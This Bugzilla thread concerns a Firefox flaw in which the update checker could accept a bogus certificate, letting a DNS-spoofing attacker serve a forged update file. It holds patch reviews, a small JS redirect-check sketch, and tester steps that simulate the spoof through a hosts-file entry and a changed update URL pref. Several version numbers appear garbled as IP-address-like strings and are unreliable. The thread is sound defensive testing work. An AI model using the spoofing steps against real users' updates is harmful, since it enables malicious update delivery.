> location " +
> "specified. Exception: " + e);
Yeah, that's true. At least it does record the exception text.
Oh, actually - isn't there an issue even if the attacker redirects HTTPS (bad cert) -> HTTPS (good cert, but his server)? That is... should you maybe observe onChannelRedirect and do the check there?
Hmm... I think you are correct.
Created attachment 234494 [details] [diff] [review]
Revised to include cert check of previous channel when redirecting.
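The shape of the redirect hook is roughly as follows; this is plain JS with XPCOM mocked out, and the names (makeRedirectChecker, rootTokenName) are illustrative stand-ins for the patch's actual verification routine.

```javascript
// An nsIChannelEventSink-style listener (Gecko 1.8-era signature) whose
// onChannelRedirect verifies the *previous* channel's cert before the
// redirect proceeds, catching an https(bad cert) -> https(attacker's
// valid cert) hop. checkCert is whatever verification the patch uses;
// note that QueryInterface must also advertise nsIChannelEventSink, or
// C++ callers will assert (the nit raised in review).
function makeRedirectChecker(checkCert) {
  return {
    onChannelRedirect(oldChannel, newChannel, flags) {
      checkCert(oldChannel); // throws if the old channel fails the check
    },
  };
}

// Illustration with a toy checker that rejects non-builtin roots:
const checker = makeRedirectChecker(ch => {
  if (ch.rootTokenName !== "Builtin Object Token") {
    throw new Error("certificate not issued by a built-in root");
  }
});

// A redirect from a channel backed by a built-in root is allowed:
checker.onChannelRedirect({ rootTokenName: "Builtin Object Token" }, {}, 0);

// A redirect from a user-accepted cert is blocked:
try {
  checker.onChannelRedirect({ rootTokenName: "Software Security Device" }, {}, 0);
} catch (e) {
  console.log("redirect blocked:", e.message);
}
```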
Comment on attachment 234494 [details] [diff] [review]
hm, you aren't adding nsIChannelEventSink to QueryInterface? Won't that trigger assertions in C++ code?
Created attachment 234730 [details] [diff] [review]
Yeah, good catch!
Comment on attachment 234730 [details] [diff] [review]
Seems like this approach would be safe enough to land on the 1.8.0 branch as well, nominating.
Since this hasn't even landed on trunk, it doesn't look like it will make the 220.127.116.11 code freeze today(-ish). Feel free to surprise us with an approval request, though.
Try for 18.104.22.168 after all
Comment on attachment 234730 [details] [diff] [review]
approved for 1.8.0 branch, a=dveditz for drivers
Please be sure to test update from a build that includes this change to a later build. I believe it works properly, but I haven't tested the 1.8.0.x branch as much as the trunk.
Comment on attachment 234730 [details] [diff] [review]
We want this for FF2.
To be safe for the 1.8 branch we'll hold on this until we go through 2 update cycles which is Sun 8/27.
Comment on attachment 234730 [details] [diff] [review]
a=schrep approving all previously triaged patches which were baking on trunk.
Testing notes: you don't have to set up the whole dns-spoofing "proof of concept" attachment to verify this fix since we can assume the user (tester) will cooperate in hacking themselves.
1) Set up a secure webserver with the cert from the PoC. For the rest of this I'll assume https://localhost/, if it's elsewhere replace localhost with the actual host you're using.
2) Create https://localhost/update.xml that will trigger an update. Easiest way is to take an existing update.xml and bump the version to 22.214.171.124. Shouldn't need to change anything else, though maybe you want to munge the hashes or the download links so you don't accidentally "upgrade" your test build. The test should be complete before anything is downloaded though.
Current builds are calling themselves "126.96.36.199pre" instead of 188.8.131.52; I sure hope that doesn't screw up the update logic -- another downside to not having nightly updates working is that we don't know :-(
You can find a working update.xml to use as a template at
3) Alter your hosts file to equate aus2.mozilla.org with your webserver's IP address. This simulates the DNS spoofing part. (Remember to undo this afterwards.)
4) Change the app.update.url pref to "https://aus2.mozilla.org/update.xml", or if you used a different path in step 2 make the path match. (Remember to reset this pref when you're done, too.)
5) In a *VULNERABLE* version, go to https://localhost/ and accept the bogus cert (for the session only, so we can restart and retest). Please use a "184.108.40.206pre" nightly prior to the fix so we can verify the "pre" bit doesn't break the updates and invalidate the test, --or-- test using a 220.127.116.11 and then use the "18.104.22.168" candidate (no 'pre') that rhelmer is building right now.
6) In the *VULNERABLE* version do "Help | Check for Updates". If you get an "updates are available" dialog you can proceed; if you do not, then the setup is incorrect somewhere.
7) If things are set up correctly then quit and start the fixed version. Visit https://localhost/ and accept the bogus cert for the session as in step 5), then "Check for Updates" as in step 6). You should be told updates are not available. This is meaningful only if step 6) in the vulnerable version previously demonstrated that the setup is correct.
8) Cleanup: reset your app.update.url pref and comment out or delete the aus2 entry in your hosts file. Shut down the webserver and uninstall the bogus cert.
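For convenience, steps 3 and 4 each boil down to a one-line change. The values below assume the test webserver is on the same machine (127.0.0.1) and that update.xml lives at the server root; adjust the IP and path to match your setup, and remember to undo both lines afterwards per step 8.

```
# /etc/hosts (step 3) -- simulate the DNS spoof; remove when done
127.0.0.1    aus2.mozilla.org

# about:config (step 4) -- point the update check at your XML; reset when done
app.update.url = https://aus2.mozilla.org/update.xml
```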
Using the testing scenario described in comment #67 (after first confirming that I had the environment set up correctly using a 22.214.171.124 Firefox), I found that in both 126.96.36.199 and 1.8.1 my bogus update.xml file was pulled from my server but not used. But the message raised when I checked for updates was not "No updates found" but "AUS: Update XML file not found (404)". Is this the error message that we want raised in this situation?
Is bug 401292 a regression from this bug?
(In reply to comment #70)
> Is bug 401292 a regression from this bug?
No. It's not a regression in FF, and it's not caused by the fix for this bug.
Further comments in bug 401292.